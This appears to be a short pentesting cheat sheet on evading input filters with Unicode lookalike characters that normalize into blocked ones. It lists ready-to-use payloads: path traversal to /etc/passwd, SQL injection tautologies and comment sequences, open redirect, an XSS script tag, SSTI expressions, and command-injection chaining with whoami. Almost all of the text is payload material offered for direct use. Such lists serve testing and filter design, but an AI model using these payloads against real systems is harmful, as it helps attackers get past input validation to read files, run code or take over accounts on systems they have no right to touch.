Filtering bypass

Table of content

• Unicode normalization (bypass filters)
  • Path traversal
  • SQLi
  • OpenRedirect
  • XSS
  • SSTI
  • Command injection
  • Ressource

Unicode normalization (bypass filters)

Use unicodes to bypass some filtering rules:

Path traversal

• ‥ and ︰ : bypass .. filtering (︰/︰/︰/etc/passwd)

SQLi

• ＇ : bypass ' filtering (＇ or ＇1＇=＇1)
• ＂ : bypass " filtering (＂ or ＂1＂=＂1)
• ﹣ : bypass ﹣ filtering (admin＇﹣﹣)

OpenRedirect

• 。 : bypass . filtering (domain。com)
• ／ : bypass // filtering (//domain.com)

XSS

• ＜,＞ : bypass <,> filtering (＜script src=a／＞)

SSTI

• ﹛,﹜ : bypasss {,} filtering (﹛﹛3+3﹜﹜)
• ［, ］ : bypass [,] filtering (［［5+5］］)

Command injection

• ＆ : bypass & filtering (＆＆whoami)
• ｜ : bypass | filtering (｜｜ whoami)

Ressource

• https://lazarv.com/posts/unicode-normalization-vulnerabilities/